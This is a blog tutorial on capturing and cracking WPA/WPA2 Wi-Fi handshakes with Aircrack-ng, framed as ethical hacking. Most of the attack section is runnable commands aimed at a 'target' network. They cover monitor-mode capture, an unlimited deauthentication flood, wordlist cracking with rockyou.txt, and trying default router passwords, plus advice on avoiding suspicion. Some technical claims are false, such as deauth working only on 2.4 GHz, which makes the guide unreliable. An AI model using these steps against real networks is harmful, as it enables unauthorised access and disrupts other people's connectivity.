A Comprehensive Guide to Wi-Fi Hacking
This is an Ethical hacking guide on Wi-Fi hacking and for educational purposes only and is in no way intended to be used for criminal purposes. The process of Wi-Fi hacking is so easy, the only real hurdle is a strong password. We first start by sniffing and capturing packets sent to and from devices. We wait for a handshake to occur. Once we have captured the handshake, we can decrypt the packet to expose the networks password. All this is achieved using Aircrack suite. For this guide we will presume you are using the Kali Linux OS.
Don’t worry I will explain what all this means.
Required Software and Hardware for Wi-Fi Hacking
What does Handshake mean?
A network handshake between an access point (AP) and a new device typically refers to the process of a device establishing a connection with an access point to join a Wi-Fi network. This handshake involves a series of steps to set up a secure and functional communication link between the device and the access point. Here’s a simplified overview of the handshake process:
-
Scanning: When a new device wants to connect to a Wi-Fi network, it scans the available Wi-Fi networks in the area and identifies the access points that are broadcasting their SSIDs (Service Set Identifiers). This is the initial step where the device looks for networks to join.
-
Association Request: The device sends an association request to the chosen access point. This request includes information about the device’s capabilities and requirements, such as the supported Wi-Fi standards and security protocols.
-
Authentication: If the access point requires authentication (e.g., a pre-shared key or WPA2/WPA3 passphrase), the device must provide the necessary credentials for verification.
-
Key Exchange: In cases where security protocols like WPA2 or WPA3 are used, there is a key exchange process to establish an encryption key for secure data transmission. This often involves a 4-way handshake between the device and the access point.
-
Association Confirmation: If all the previous steps are successful, the access point sends an association confirmation to the device, indicating that the connection is established, and the device is now part of the Wi-Fi network.
-
IP Assignment: After the handshake is complete, the access point may assign an IP address to the new device through DHCP (Dynamic Host Configuration Protocol) or other means, so the device can communicate on the network.
-
Data Transfer: With the handshake complete and an IP address assigned, the device can now send and receive data over the wireless network.
The exact details of the handshake process can vary depending on the specific Wi-Fi standards (e.g., 802.11n, 802.11ac, 802.11ax) and security protocols (WEP, WPA, WPA2, WPA3) in use. The goal of this handshake is to establish a secure and functional connection between the access point and the new device, ensuring that data can be transmitted and received in a standardized and secure manner.
What are Packets?
Internet traffic and packets are fundamental concepts in computer networking. Here’s a brief explanation of each:
-
Internet Traffic:
Internet traffic refers to the data that flows over the Internet. It includes all the information exchanged between devices and systems connected to the Internet. Internet traffic can take many forms, including web page requests, emails, file downloads, video streaming, and more. Internet traffic can be categorized into two main types:
-
Upstream Traffic: This is data sent from your device to a remote server or destination on the Internet, such as when you send an email or request a web page.
-
Downstream Traffic: This is data received by your device from remote servers or sources on the Internet, such as when you receive emails, view web pages, or stream videos.
-
-
Packets:
In network communication, data is divided into smaller units called “packets” for efficient transmission. Packets are like small chunks of data that contain both the actual data being sent and control information to help them reach their destination. Here’s what you need to know about packets:
-
Data Segmentation: Large files or messages are broken down into smaller packets for transmission. This segmentation allows for efficient use of network resources and helps in error recovery.
-
Header Information: Each packet includes a header that contains essential information, such as the source and destination IP addresses, protocol information, and sequence numbers. This header is used by network devices to route packets to their intended destinations.
-
Ordering and Reassembly: Packets may travel different routes to reach their destination. At the destination, they are reassembled in the correct order to reconstruct the original data.
-
Reliability: Packets can be retransmitted if they are lost or corrupted during transmission, ensuring reliable data delivery.
-
Efficiency: By breaking data into packets, the network can efficiently transmit data, as it can mix packets from various sources and destinations.
-
In summary, internet traffic is the flow of data over the Internet in packets. Packets are the small units into which data is divided for efficient and reliable transmission across networks. Packets contain control information to help them reach their destination and can be reassembled to reconstruct the original data.
We can capture these packets for analysis.
Passwords
Too many people use weak passwords for convenience, but after reading this guide we hope you will take better care with your passwords in future.
Popular weak examples
- abc123
- letmein2001
- password1234
- simon2000
Aircrack-ng Suite
Aircrack-ng is a versatile suite of wireless network security tools designed for assessing and testing the security of Wi-Fi networks. It’s commonly used by security professionals, penetration testers, and network administrators to evaluate the vulnerabilities of wireless networks and to secure them. Aircrack-ng includes several individual tools that serve various purposes, such as network monitoring, capturing packets, and cracking Wi-Fi passwords. Here are some of the main components of the Aircrack-ng suite:
-
Airodump-ng: This tool is used for capturing packets from wireless networks. It can list nearby wireless networks, display detailed information about them, and capture packets from a specific network. Airodump-ng is often used to collect data for further analysis.
-
Aireplay-ng: Aireplay-ng is used for injecting traffic into a wireless network. This can be used to test the security of a network by sending deauthentication frames or other malicious traffic to test how the network responds.
-
Aircrack-ng: Aircrack-ng is a tool for cracking Wi-Fi encryption keys. It can be used to perform dictionary attacks or brute-force attacks to recover Wi-Fi passwords, provided the captured packets contain sufficient information.
-
Airbase-ng: Airbase-ng is a tool for creating rogue access points. This is often used for security testing to assess how clients behave when connecting to a rogue network. It can be helpful in testing the security awareness of users and the configuration of client devices.
-
Airdecap-ng: This tool is used to decrypt WEP or WPA/WPA2 encrypted traffic that has been captured using Airodump-ng.
-
AIROPeek: AIROPeek is a Windows-based application for wireless packet capture, but it is now considered outdated, and Airodump-ng is typically used instead.
-
Packetforge-ng: This tool is used to create custom packets for use in various attacks, such as injection attacks.
Aircrack-ng is primarily used for legitimate security testing, auditing, and monitoring of wireless networks. However, it’s important to note that using Aircrack-ng or any similar tools without proper authorization or for malicious purposes can be illegal and unethical. Always obtain the necessary permissions and adhere to the legal and ethical guidelines when using these tools.
Let's Get Started Wi-Fi Hacking!
Capturing Wi-Fi Credentials
Connect your Wi-Fi adapter then open a new terminal and follow these commands.
iwconfig
iwconfig
shows the connected Wi-Fi adapters and their status.
sudo airmon-ng check kill
Kills all network adapter processes to stop any conflicts.
sudo airmon-ng start wlan0
Starts the Wi-Fi adapter.
sudo airmon-ng
Confirms previous action.
sudo airodump-ng wlan0mon
Scans for networks.
Note the targets bssid
and channel
number.
sudo airodump-ng wlan0mon -d <bssid>
To scan the targets network only.
sudo airodump-ng -w hcapture -c <channel> --<bssid> wlan0mon
To capture targets network traffic.
Forcing a Handshake to Occur
To force the four-way handshake on any network we can send deauth packets to the network router, this deauthorizes all devices connected to the network, kicking them off and forcing them to re-send their login credentials to reconnect back on to the network. Once we stop the deauth attack the network devices are able to reconnect to the network, at this point we capture the handshake, containing the encrypted data.
Now open another terminal, leaving the previous terminal open, capturing traffic. In the new terminal enter the following command:
sudo aireplay-ng --deauth 0 -a <bssid> wlan0mon
This will deauthorize all devices from the targets network, forcing them to reconnect. Once a device reconnects, we will have captured the handshake between the device and the network router. The handshake contains the networks encrypted password.
Once the handshake has been captured, close the second terminal window, to stop the deauth attack.
Now enter the following command.
iwconfig
To check adapter status.
sudo airmon-ng stop wlan0mon
To stop the Wi-Fi adapter, we no longer need to use it.
iwconfig
To confirm its disconnected.
Be Warned: Do not run the deauth attack for a prolonged period of time, you will be blocking access to the target network, and this can arouse suspicion. You can actually capture the handshake without doing the attack, but it will take longer.
Cracking Wi-Fi Credentials
Locate where the hCapture.cap file was saved. Once you found the capture file, open a new terminal and navigate to where the hCapture.cap file is stored. Now then enter the following command:
aircrack-ng <location>/hCapture.cap -w /usr/share/wordlists/rockyou.txt
This will begin decrypting the capture file.
The rockyou.txt has millions of leaked passwords and if the target has a silly password, chances are you will find it in there. If the target has a custom or silly SSID, chances are their password will be silly too, remember a lot of people like to use passwords that are easy to remember.
If this fails to crack the encryption, you may need to do some research on the targets access point, if the SSID has not been changed then chances are the password is the default password too, you can find default router passwords online.
The process is simple, the only real hurdle, is the strength of the target’s password.
To Avoid Wi-Fi Hacking on Your Network
Switch your router to use only 5Ghz as deauth packets can only be sent on the 2.4Ghz band, this only stops the deauth attack though, it won’t stop the handshake being captured, but it will slow the hacker down.
Use a stronger password.
Tips for a stronger password:
Don’t use:
- People’s names
- Places
- Interests
- Dates
All are identifiable information and can be easily gathered using OSint (open-source intelligence). Use a good mix of letters and symbols. Use a mix of Upper and Lower casing. A good password should look something like this:
aXpg-m4jn8-83C-83d0
That’s 19 characters using letters symbols upper and lower casing but also note the blocks of letters either side of the hyphens are varied in size:
- 1st block is four characters.
- 2nd block is five characters.
- 3rd block is three characters.
- 4th block is four characters.
This will make it almost impossible for an automated password generator to guess your password.
All these tips combined should make you bulletproof to Wi-Fi Hacking.
Conclusion
Understanding concepts like internet traffic and packets is essential for comprehending the fundamental workings of computer networks. Internet traffic represents the data flow over the internet, encompassing the vast array of information exchanged between connected devices. Packets, on the other hand, are the discrete units into which data is divided, ensuring efficient and reliable transmission across networks.
Additionally, tools like airmon-ng
and the broader Aircrack-ng suite play a crucial role in the realm of network security and wireless network assessment. They enable professionals to monitor, capture, analyze, and secure wireless networks, contributing to the overall protection and optimization of Wi-Fi connections. However, it’s imperative to exercise responsible and ethical use of these tools, adhering to legal guidelines and ethical standards to ensure network security without compromise.
Ethical Hacking Guides
We have many guides to help you on your journey into the world of Ethical Hacking. If this is something you find interesting, please take a look here today: Ethical Hacking Guides.
Recommendation:
ALFA Network Wi-Fi Adapter: https://amzn.to/3QbZ6AE
This Wi-Fi adapter is essential if you are to learn Wi-Fi Hacking.